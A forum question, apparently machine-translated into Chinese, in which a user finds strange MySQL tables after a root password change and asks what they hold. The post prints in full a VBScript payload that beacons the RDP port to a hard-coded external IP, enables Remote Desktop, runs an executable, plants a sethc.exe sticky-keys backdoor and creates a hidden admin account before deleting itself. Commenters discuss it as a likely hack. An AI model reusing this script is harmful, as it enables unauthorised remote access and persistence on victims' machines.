MySQL数据库本身中的奇怪表

我最近遇到了一个问题，我的MySQL根密码不知怎么被更改了。我重新设置了它，虽然它可能只是一个腐败，我做了一些挖掘。在MySQL数据库中，我发现了3个名为john、john1和john3的表

这些表中的第一个表有一条很长的记录，其中有以下几条是人类可读的：

on error resume next

Set fso8 = CreateObject("Scripting.FileSystemObject")
Set ObjFSO2 = CreateObject("Scripting.FileSystemObject")
If fso8.FileExists("C:\WINDOWS\Help\cnwb.html") Then 
ObjFSO2.DeleteFile Wscript.ScriptFullName
WScript.quit
else
end if

Set OperationRegistry=WScript.createObject("WScript.Shell") 
Dim TSPort,TSState,TSRegPath 
TSRegPath="HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\PortNumber" 
TSPort=OperationRegistry.RegRead(TSRegPath) 
Set xPost=CreateObject("Microsoft.XMLHTTP") 
xPost.Open "GET","http://42.51.151.7:8002/mof.asp?IPnumber=" & TSPort,0 
xPost.Send() 


set obj=wscript.createObject("wscript.shell") 
obj.Run "cmd /c sc config TermService start= auto",vbhide
obj.Run "cmd /c sc start TermService",vbhide
obj.Run "cmd /c start c:/windows/system/const.exe",vbhide



Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\debugger",WScript.CreateObject("WScript.shell").ExpandEnvironmentStrings("%SystemRoot%")&"\system32\taskmgr.exe","REG_SZ"





Set o=CreateObject("Shell.Users")
Set z=o.create("aspwner")
z.changePassword "qq25896!@#",""
z.setting("AccountType")=3

Set ObjFSO = CreateObject("Scripting.FileSystemObject")
ObjFSO.DeleteFile Wscript.ScriptFullName
WScript.quit
====

有人能解释一下这可能是什么吗？我对这些桌子有点怀疑。我不想在不了解它们可能是什么的情况下删除它们，因为这是一个生产MySQL安装

---

MySQL版本是在Ubuntu 13.10系统上的5.5.35版本。

看起来你已经有了hacked@abidibo是的，我也这么认为，但是我能做些什么来再次检查这个假设呢？好吧，看看你的日志文件，搜索奇怪的请求。通常，攻击者利用知名web库的一些漏洞进行攻击，如旧版本的ckeditor等。。。因此，这取决于服务器向公众公开的内容。你还写了你有一台ubuntu机器，而这种注入的代码似乎与windows相关，所以作为一个应用程序，它看起来有点奇怪attack@abidibo是的，那也是我的想法。不过，我确实在该系统上安装了Navicat，它本质上是一个windows mysql连接工具，但也使用了一些黑客在Ubuntu上操作。也许我会和他们商量一下，以防他们需要这个。谢谢你的评论。